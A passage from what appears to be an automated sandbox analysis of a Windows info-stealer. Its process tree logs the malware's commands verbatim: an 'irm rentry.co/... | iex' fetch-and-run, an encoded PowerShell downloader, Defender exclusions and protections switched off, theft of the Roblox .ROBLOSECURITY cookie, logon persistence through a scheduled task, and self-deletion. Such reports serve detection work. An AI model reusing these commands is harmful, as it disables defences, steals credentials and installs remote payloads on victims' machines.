        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        System Location Discovery: System Language Discovery
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        Drops file in Drivers directory
        
        PID:6264
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:5508
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        Views/modifies file attributes
        
        PID:6392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:6156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:3400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:2680
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:6488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:6464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:6940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:5832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:7028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:7036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:1080
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:5056
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        System Location Discovery: System Language Discovery
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:6628
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:7008
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        Executes dropped EXE
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        Executes dropped EXE
        
        PID:4572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        15⤵
        
        PID:5276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        16⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:2400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:4064
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        15⤵
        System Location Discovery: System Language Discovery
        
        PID:1116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:6336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1604
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        Views/modifies file attributes
        
        PID:5688
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:5296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:6596
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1716 -s 396
        16⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6296
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:6916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:5376
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:7008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:3164
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:6344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:6164
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:6008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:6120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:6312
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        Executes dropped EXE
        
        PID:4844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:6404
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        15⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:6632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        16⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        17⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        18⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        18⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:7004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6468
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6664
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF176.tmp.bat""
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:7052
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        15⤵
        Delays execution with timeout.exe
        
        PID:4580
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        15⤵
        System Location Discovery: System Language Discovery
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        Executes dropped EXE
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        13⤵
        
        PID:5548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        14⤵
        Blocklisted process makes network request
        
        PID:5288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        15⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        16⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        17⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        17⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\cmd.exe
        
